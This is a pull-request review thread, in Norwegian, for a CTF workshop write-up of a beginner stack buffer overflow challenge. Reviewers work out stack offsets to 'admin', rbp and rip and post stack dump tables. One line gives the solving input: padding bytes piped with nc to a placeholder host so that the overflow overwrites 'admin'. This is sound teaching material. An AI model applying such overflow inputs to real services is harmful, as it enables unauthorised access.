Pwn overflow1
Loevland/ctf-workshop pull request #18
Opened 2024-01-10 20:25 UTC by marius-j-i

Lagde writeup med illustrasjon i .md og .c

2024-01-11 09:42 UTC, Loevland commented
`rbp` og `rip` burde ligger over `admin` i stack-visualiseringa (mulig d e noe padding i mellom admin og `rbp` også, men har ikke sjekket). Rekkefølgen på overwrite vil være: `name->admin->padding?->rbp->rip`

Ellers ser det nydelig ut!

Skal vi legge inn en lignende stack-visualisering i programmet som den dem bruke i etjensten sin oppgave? Thoughts?

2024-01-11 15:35 UTC, marius-j-i commented
Trur æ skjønne. 
Padding imellom registeran og admin kan vi jo enkelt illustrere med nåkka 
...........

2024-01-12 13:42 UTC, marius-j-i commented
@Loevland 
Ser du over igjen om nåkka e ute av plass?

2024-01-12 13:53 UTC, Loevland commented
Rekkefølga e korrekt🔥

Kan sjekke ikveld om d e nokka padding i mellom `admin` og `rbp`, og evt kor mye

2024-01-13 00:00 UTC, Loevland commented
`admin` lå på offset 44 fra `name` bufferet, som ikke gjør d så enkelt å visualisere, så endra fra `int` til `long int` for at den skulle kapre 8 bytes istedet for 4 på stacken, slik at vi har alignment og det er lettere å visualisere.

Dette er følgende offsets fra `name` bufferet til de forskjellige stack-punktene:
- `rip`: 56 bytes
- `rbp`: 48 bytes
- `admin`: 40 bytes

*Det eneste som trenger å legges til i writeupen er ei linje med 8 ekstra bytes med padding mellom slutten av `name` og begynnelsen av `admin`*

2024-01-15 14:02 UTC, Loevland requested changes
Det i forrige melding ☝🏼

2024-01-17 20:04 UTC, Loevland reviewed
La inn ett par suggestions, viktigste e at stacken blir korrekt

2024-01-17 20:04 UTC, Loevland commented on pwn/overflow1/writeup/README.md
> +echo "0000111122223333444455556666777788889999aaaa<non-zero-bytes>" | nc <host> 9001
Æ oppdaterte koden for å få stack 8-byte aligned
```suggestion
echo "0000111122223333444455556666777788889999<non-zero-bytes>" | nc <host> 9001
```

2024-01-17 20:04 UTC, Loevland commented on pwn/overflow1/writeup/README.md
> +|           &name      |  64 00 00 00 00 00 00 00  |   d \0 \0 \0 \0 \0 \0 \0 |
|  Mem.Addr./Variables |  Hex-values (8 bytes/row) |      Ascii Characters    |
|---------------------:|:-------------------------:|:------------------------:|
|                   rip                 |  00 7f fd 13 76 d6 ff 00     |   .  .  ý  .  v  Ö  ÿ  .         |
|                  rbp                 |  00 7f ff f1 37 6d 88 00     |   .  .  ÿ  ñ  7  m  .  .        |
|              &admin              |  00 00 00 00 00 00 00 00  |  \0 \0 \0 \0 \0 \0 \0 \0 |
|              padding             |  00 00 00 00 00 00 00 00  |  \0 \0 \0 \0 \0 \0 \0 \0  |
|           &name + 24         |  02 00 00 00 00 00 00 00  |   . \0 \0 \0 \0 \0 \0 \0   |
|           &name + 16         |  ff fb 8b 1f 00 00 00 00     |   Ù  E  æ  J  ü  .  .  .       |
|           &name +  8          |  d9 45 e6 4a fc 7f 00 00    |  \0  E \0  J \0 \0 \0 \0   |
|           &name                 |  64 00 00 00 00 00 00 00  |   d \0 \0 \0 \0 \0 \0 \0  |

2024-01-17 20:04 UTC, Loevland commented on pwn/overflow1/writeup/README.md
> +|           &name      |  31 31 31 31 30 30 30 30  |   1  1  1  1  0  0  0  0 |
|  Mem.Addr./Variables |  Hex-values (8 bytes/row) |     Ascii Characters     |
|---------------------:|:-------------------------:|:------------------------:|
|                 rip            |  00 7f fd 13 76 d6 ff 00    |   .  .  ý  .  v  Ö  ÿ  .       |
|                 rbp          |  00 7f ff f1 37 6d 88 00     |   .  .  ÿ  ñ  7  m  .  .     |
|            &admin        |             {non-zero}            |        {non-zero}         |
|            padding       |  39 39 39 39 38 38 38 38  |   9  9  9 9  8  8  8  8  |
|           &name + 24 |  37 37 37 37 36 36 36 36  |   7  7  7  7  6  6  6  6 |
|           &name + 16 |  35 35 35 35 34 34 34 34  |   5  5  5  5  4  4  4  4 |
|           &name +  8  |  33 33 33 33 32 32 32 32  |   3  3  3  3  2  2  2  2 |
|           &name          |  31 31 31 31 30 30 30 30  |   1  1  1  1  0  0  0  0 |

2024-01-17 20:04 UTC, Loevland commented on pwn/overflow1/writeup/dump.c
> +#include <ctype.h>
Har ikke sjekka den her mtp. at æ endra offset til admin variabelen på stacken fra 44 til 40

2024-01-31 23:36 UTC, Loevland approved these changes

2024-01-31 23:44 UTC, merged